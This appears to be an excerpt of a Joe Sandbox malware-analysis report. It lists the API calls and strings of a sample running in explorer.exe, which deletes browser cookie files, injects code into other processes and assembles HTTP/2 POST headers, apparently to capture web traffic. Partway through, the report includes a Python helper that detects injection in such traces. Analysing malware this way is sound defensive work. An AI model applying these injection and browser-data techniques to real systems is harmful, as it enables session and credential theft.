                        • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                        • API String ID: 3097474925-1175993956
                        • Opcode ID: 4dab4dd73c0695081e66fbac2a8ae5bc3535fe57fd00dba859997805b5ea7ee0
                        • Instruction ID: aceb489ddcab96783bf93d191587df2f07a8d64a1ba713b26229507b0e38636d
                        • Opcode Fuzzy Hash: 4dab4dd73c0695081e66fbac2a8ae5bc3535fe57fd00dba859997805b5ea7ee0
                        • Instruction Fuzzy Hash: 9A118EA438135623E62733661C82FAF658DDF96B91F1100A4F6456EAC2DEC4DE4243AA

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • wsprintfA.USER32 ref: 00383C1F
                          • Part of subcall function 00381235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0038123F
                          • Part of subcall function 00381235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00383C33), ref: 00381251
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00383C69
                        • Process32First.KERNEL32(00000000,?), ref: 00383C88
                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00383CA1
                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00383CB1
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00383CC1
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00383D12
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00383D68
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00383D77
                        • Sleep.KERNELBASE(000003E8), ref: 00383D82
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateChangeCloseCreateFindFirstMappingNextNotificationOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                        • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                        • API String ID: 1384999969-2554907557
                        • Opcode ID: a13f10f1ef2a6aa37791831c6500a023bfbf757b450761b7207fdc9e69f2b899
                        • Instruction ID: e9993a11c7bb23ee0e7e4135a7289df10d13d92e6bb934a7f3a9d90067fa0b25
                        • Opcode Fuzzy Hash: a13f10f1ef2a6aa37791831c6500a023bfbf757b450761b7207fdc9e69f2b899
                        • Instruction Fuzzy Hash: 8D4127B12043029BC617FB74DC85A7F77ADAF84B40F0105D8F9519B6D1EB20DE0A87A6

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                          • Part of subcall function 00381363: Process32First.KERNEL32(00000000,?), ref: 00381393
                          • Part of subcall function 00381363: FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                          • Part of subcall function 00381363: lstrcmpiA.KERNEL32(?), ref: 003813A3
                          • Part of subcall function 00381363: Process32Next.KERNEL32(00000000,00000128), ref: 003813C0
                        • Sleep.KERNELBASE(000003E8,?,00000000,?,0038382F,?,00383C53,00000001), ref: 003835FA
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0038382F,?,00383C53,00000001), ref: 00383613
                        • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00383623
                        • wsprintfW.USER32 ref: 00383644
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 0038150D
                          • Part of subcall function 003814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 00381557
                          • Part of subcall function 003814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                          • Part of subcall function 003814D8: DeleteFileW.KERNELBASE(00000000), ref: 00381571
                          • Part of subcall function 003814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                          • Part of subcall function 003814D8: FindClose.KERNELBASE(00000000), ref: 0038158F
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0038382F,?,00383C53,00000001), ref: 00383672
                        • lstrcatW.KERNEL32(00000000,00384614), ref: 00383682
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFindHeap$wsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesChangeCreateDeleteFreeNotificationSleepSnapshotToolhelp32lstrcmpi
                        • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                        • API String ID: 877252726-3669280581
                        • Opcode ID: b24347381c73e0d14f7770d56e7f8f4f2c5de0cd3ca21b507422c1e924aa137a
                        • Instruction ID: 1ffc2e5d8cdf6cf90ce1d30bb222e4c5daa59da9efebabbabd16361a3e80ae4d
                        • Opcode Fuzzy Hash: b24347381c73e0d14f7770d56e7f8f4f2c5de0cd3ca21b507422c1e924aa137a
                        • Instruction Fuzzy Hash: 1E11C27434030227E61733655C9AF3E255DDBD2F02F1500E8F606AEAC1EE8408825369

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                          • Part of subcall function 00381363: Process32First.KERNEL32(00000000,?), ref: 00381393
                          • Part of subcall function 00381363: FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                        • Sleep.KERNELBASE(000003E8,?,00000000,?,00383834,?,00383C53,00000001), ref: 003836B3
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,00383834,?,00383C53,00000001), ref: 003836CC
                        • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 003836DC
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 0038150D
                          • Part of subcall function 003814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 00381557
                          • Part of subcall function 003814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                          • Part of subcall function 003814D8: DeleteFileW.KERNELBASE(00000000), ref: 00381571
                          • Part of subcall function 003814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                          • Part of subcall function 003814D8: FindClose.KERNELBASE(00000000), ref: 0038158F
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFind$CloseFirstHeapwsprintf$AllocateAttributesChangeCreateDeleteFolderNextNotificationPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                        • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                        • API String ID: 2390375701-637609321
                        • Opcode ID: 5a8cc03ba78cee8bf037322d96511ed9c1bbd1ab709a41cb244eba17236ce99f
                        • Instruction ID: 8b7114b0f705fc7ec5414cb4d4ea56cd5fc80efabc9146b4a70d71c6424a7a7e
                        • Opcode Fuzzy Hash: 5a8cc03ba78cee8bf037322d96511ed9c1bbd1ab709a41cb244eba17236ce99f
                        • Instruction Fuzzy Hash: 30F0A0A530032233961B336B5C0ED6F596DCFD7B52B0101ECF2069AAD1EE54094353B9

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 279 381363-38137f CreateToolhelp32Snapshot 280 3813d1-3813d6 279->280 281 381381-381399 Process32First 279->281 282 3813c6-3813c8 281->282 283 3813ca-3813cb FindCloseChangeNotification 282->283 284 38139b-3813ab lstrcmpiA 282->284 283->280 285 3813b8-3813c0 Process32Next 284->285 286 3813ad-3813b3 call 38133f 284->286 285->282 286->285
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                        • Process32First.KERNEL32(00000000,?), ref: 00381393
                        • lstrcmpiA.KERNEL32(?), ref: 003813A3
                        • Process32Next.KERNEL32(00000000,00000128), ref: 003813C0
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 545148253-0
                        • Opcode ID: 27badec4df403b793cb27f25fe17f3a7ab22c79f9a2496e4951162f239079ea9
                        • Instruction ID: dd7f4af5447128d00ac1342a11b1df5bb43f344db98cfb276f452ce51839b870
                        • Opcode Fuzzy Hash: 27badec4df403b793cb27f25fe17f3a7ab22c79f9a2496e4951162f239079ea9
                        • Instruction Fuzzy Hash: 42F0C8B55013149BD7226B25AC08BDFB7BCEB49321F0101E0F949E2590EBB48D558B51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 309 381235-381247 OpenFileMappingA 310 381249-381259 MapViewOfFile 309->310 311 38125c-381260 309->311 310->311
                        APIs
                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0038123F
                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00383C33), ref: 00381251
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: e561ba3a8f9e219c319b09b2a41a859fe14b5598bdad03e0a989b76cfae1928c
                        • Instruction ID: 7eecba42c209451fc4b7008ee1787cedba192128ea4b299ed8191e17a016a92f
                        • Opcode Fuzzy Hash: e561ba3a8f9e219c319b09b2a41a859fe14b5598bdad03e0a989b76cfae1928c
                        • Instruction Fuzzy Hash: 53D017727053327BE7306ABB6C0CF83AE9DDF86BE1F024065B609D2150D6608811C3F0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 317 381011-38101b call 381274 320 38102d-38102e 317->320 321 38101d-381027 GetProcessHeap RtlFreeHeap 317->321 321->320
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                        • RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Heap$FreeProcessQueryVirtual
                        • String ID:
                        • API String ID: 2580854192-0
                        • Opcode ID: 28e37829eed1df146394ec2ef5ccb1163587008a10ba77ae65890a8b6cae9a3a
                        • Instruction ID: e5ac072a6e50e7f7b4b28c79569f6c02cbe3915ba05d9413e3c68fa0849d2d9f
                        • Opcode Fuzzy Hash: 28e37829eed1df146394ec2ef5ccb1163587008a10ba77ae65890a8b6cae9a3a
                        • Instruction Fuzzy Hash: 9DC08CB200436096CA2237B03C0CBC7AA1C9F09351F050AC1B60496042CAA0880683A0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 322 3815a9-3815bd SetFileAttributesW DeleteFileW
                        APIs
                        • SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,0038168B), ref: 003815AF
                        • DeleteFileW.KERNELBASE(00000000), ref: 003815B6
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: File$AttributesDelete
                        • String ID:
                        • API String ID: 2910425767-0
                        • Opcode ID: e312f82b7c571d28c48e7a3061a85bcadf76dd335cbe809afbf8a65eae86f509
                        • Instruction ID: c3d5d4f80337d0dd8441071abda10c6d9821372e9f30ba50a0b57a32297162cf
                        • Opcode Fuzzy Hash: e312f82b7c571d28c48e7a3061a85bcadf76dd335cbe809afbf8a65eae86f509
                        • Instruction Fuzzy Hash: 50B09272002631ABD6122B14BC0DBCF665CEF0A311F150082F301954509B941A0287EA

                        Control-flow Graph
                        • Graph 323, 381000-381010: GetProcessHeap, RtlAllocateHeap (legend: Executed / Not Executed)
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 350ed13138f111faf5a2e9036239a3fc6bbcfa3c05008eef2837057b061d0491
                        • Instruction ID: b38b6225fc20fe4ba8081313156a4919d7fde2b692b18ace5f4fabb8bf1fe232
                        • Opcode Fuzzy Hash: 350ed13138f111faf5a2e9036239a3fc6bbcfa3c05008eef2837057b061d0491
                        • Instruction Fuzzy Hash: 17A002F55503115BDE4557A4BD0DB17751CB744745F248584734685450A96454148721
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,74DEE800), ref: 0038201A
                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00382055
                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 003820E5
                        • RtlMoveMemory.NTDLL(00000000,003850A0,00000016), ref: 0038210C
                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00382134
                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00382144
                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0038215E
                        • GetLastError.KERNEL32 ref: 00382166
                        • CloseHandle.KERNEL32(00000000), ref: 00382174
                        • Sleep.KERNEL32(000003E8), ref: 0038217B
                        • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00382191
                        • GetProcAddress.KERNEL32(00000000), ref: 00382198
                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003821AE
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003821D8
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003821EB
                        • CloseHandle.KERNEL32(00000000), ref: 003821F2
                        • Sleep.KERNEL32(000001F4), ref: 003821F9
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0038220D
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00382224
                        • CloseHandle.KERNEL32(00000000), ref: 00382231
                        • CloseHandle.KERNEL32(?), ref: 00382237
                        • CloseHandle.KERNEL32(?), ref: 0038223D
                        • CloseHandle.KERNEL32(00000000), ref: 00382240
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                        • String ID: atan$ntdll$opera_shared_counter
                        • API String ID: 1066286714-2737717697
                        • Opcode ID: 2129c80869f93289e1b78718f9aa83b8b939ebfedc1192d278c1f024dd3d7fea
                        • Instruction ID: 97e15fea8af45db6ad780262a3b02264174cb81302df6aa157eb847ee29a29fc
                        • Opcode Fuzzy Hash: 2129c80869f93289e1b78718f9aa83b8b939ebfedc1192d278c1f024dd3d7fea
                        • Instruction Fuzzy Hash: 126191B1608305AFD312EF65CC84E6BBBECEB88754F010699F949D3291D774DD058B62
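The function above opens a target with PROCESS_ALL_ACCESS (0x1FFFFF), calls NtSetInformationProcess with class 0x34 (52, ProcessMitigationPolicy in the PROCESSINFOCLASS enumeration), resolves an export of ntdll (the string ids are ntdll and atan), reads and then overwrites 5 bytes in the target and starts a remote thread; the write-then-thread pair is repeated once more before the handles are closed. As an added triage helper, not part of the Joe Sandbox report or of the sample, the Python below parses trace lines in the report's own "• Api.MODULE(args), ref: addr" form, decodes the OpenProcess access mask with the winnt.h names, and flags a cross-process write that is followed by CreateRemoteThread. The sample input is copied from the lines above (Sleep and CloseHandle lines omitted); what the 5-byte write contains is not shown by the report, so the code only notes that the size fits an x86 rel32 jmp.

```python
import re
from dataclasses import dataclass
from typing import List, Union

# Added triage helper, not part of the Joe Sandbox report. It parses the
# "• Api.MODULE(args), ref: addr" lines and flags remote-thread injection.
# Access-right names and values are those of the Windows SDK (winnt.h).

Arg = Union[int, str, None]            # hex value, string literal, or None for "?"

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Arg]
    ref: int                            # call-site address from the "ref:" field

LINE_RE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

def parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)           # also covers the tool's negative form "-00000016"
    except ValueError:
        return token                    # string literal such as opera_shared_counter
    # caveat: a literal made only of hex digits (e.g. "face") would be read as a number

def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                    # headings, "Part of subcall" lines, blanks
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return sorted(calls, key=lambda c: c.ref)

PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF             # value on Windows Vista and later
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0020  # CREATE_THREAD | VM_OPERATION | VM_WRITE

def decode_access(mask: int) -> List[str]:
    if mask == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in PROCESS_ACCESS.items() if mask & bit]

def find_injection(calls: List[ApiCall]) -> List[str]:
    findings = []
    for c in calls:
        if c.name == "OpenProcess" and c.args and isinstance(c.args[0], int):
            mask = c.args[0]
            if mask == PROCESS_ALL_ACCESS or mask & INJECT_RIGHTS == INJECT_RIGHTS:
                findings.append(f"{c.ref:08X} OpenProcess({'|'.join(decode_access(mask))})")
    writes = [c for c in calls if c.name == "WriteProcessMemory"]
    threads = [c for c in calls if c.name == "CreateRemoteThread"]
    # names resolved in this function: string args of GetModuleHandleA / GetProcAddress
    symbols = [a for c in calls if c.name in ("GetModuleHandleA", "GetProcAddress")
               for a in c.args if isinstance(a, str)]
    for w in writes:
        after = [t for t in threads if t.ref > w.ref]
        if after:
            findings.append(f"{w.ref:08X} WriteProcessMemory -> {after[0].ref:08X} "
                            f"CreateRemoteThread (remote thread injection)")
        size = w.args[3] if len(w.args) > 3 else None      # nSize is the 4th parameter
        if symbols and isinstance(size, int) and size <= 16:
            findings.append(f"{w.ref:08X} {size}-byte write after resolving "
                            f"{'/'.join(symbols)} (patch-sized; 5 bytes fits an x86 rel32 jmp)")
    return findings

# Sample input copied from the report's function at 0038201A-00382240 (Sleep/CloseHandle omitted).
TRACE = """\
• OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,74DEE800), ref: 0038201A
• NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00382055
• NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 003820E5
• RtlMoveMemory.NTDLL(00000000,003850A0,00000016), ref: 0038210C
• RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00382134
• NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00382144
• CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0038215E
• GetLastError.KERNEL32 ref: 00382166
• GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00382191
• GetProcAddress.KERNEL32(00000000), ref: 00382198
• ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003821AE
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003821D8
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003821EB
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0038220D
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00382224
"""
# Heap helper at 00381000 from the same report: no cross-process activity, so no findings.
BENIGN = """\
• GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
• RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
"""

if __name__ == "__main__":
    for line in find_injection(parse_trace(TRACE)):
        print(line)
```

Run on the whole "Functions" listing of a report, the helper is a quick way to pick out which of the many dumped routines actually touch another process; it is a triage aid keyed to API names and argument values, not a detection signature, and its 16-byte threshold for a patch-sized write is a heuristic.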
                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 003811A9
                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 003811C1
                        • lstrlen.KERNEL32(?,00000000), ref: 003811C9
                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 003811D4
                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 003811EE
                        • wsprintfA.USER32 ref: 00381205
                        • CryptDestroyHash.ADVAPI32(?), ref: 0038121E
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00381228
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                        • String ID: %02X
                        • API String ID: 3341110664-436463671
                        • Opcode ID: 56490436473f6f92534b09e4ad1d67c9d2cd63aeb51e7807f295bb0ad18bda0b
                        • Instruction ID: c5f4c0e4fff49f834b48578fac95bf98dd0d13c6c3099a89602cade64251fc2a
                        • Opcode Fuzzy Hash: 56490436473f6f92534b09e4ad1d67c9d2cd63aeb51e7807f295bb0ad18bda0b
                        • Instruction Fuzzy Hash: 3F111FB590020DBFDB129FA5EC88EEFBBBCEB44741F1040A5F605E2550E7714E559B60
                        APIs
                        • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00382EC5), ref: 00382E27
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00382E52
                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00382E7F
                        • StrStrIW.SHLWAPI(?,NetworkService), ref: 00382E92
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                        • String ID: NetworkService
                        • API String ID: 1656241333-2019834739
                        • Opcode ID: c036433ade85b5a10e6be7a560e6cb6a273abc1e675fe5b7d8c99820c21ea012
                        • Instruction ID: e3bb5b243b4797f5066b66515e7cbac99074c7532f3d3c481cce4ec660da6713
                        • Opcode Fuzzy Hash: c036433ade85b5a10e6be7a560e6cb6a273abc1e675fe5b7d8c99820c21ea012
                        • Instruction Fuzzy Hash: 6A01D4B1300346BFD3267B219C49E6B7A9DEBD8392F0140A9FA4AD6142DAB49C808760
                        APIs
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                          • Part of subcall function 0038104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00382A16,?,00000001), ref: 00381056
                          • Part of subcall function 0038285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 003828A2
                        • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00382A4A
                        • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00382A6C
                        • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00382A8D
                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00382A96
                        • StrToIntA.SHLWAPI(00000000), ref: 00382AB9
                        • wnsprintfA.SHLWAPI ref: 00382B0D
                        • lstrcat.KERNEL32(00000000,?), ref: 00382B2D
                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 00382B35
                        • lstrcat.KERNEL32(00000000,?), ref: 00382B3C
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                        • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                        • API String ID: 2605944266-950501416
                        • Opcode ID: 48efa5c3ebedde2b9797f18301640505b0bb35f643236e9d9b16389347342e89
                        • Instruction ID: 490330d7d8ceff95e3fa43d6b63624f3a9ddcaf3cc5523361149269ed5e81397
                        • Opcode Fuzzy Hash: 48efa5c3ebedde2b9797f18301640505b0bb35f643236e9d9b16389347342e89
                        • Instruction Fuzzy Hash: D95180706043415FCB1BFF248985A6FBBDAAF88304F0408DDF8859B692DB74DD468766
                        APIs
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00382FFA
                        • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383024
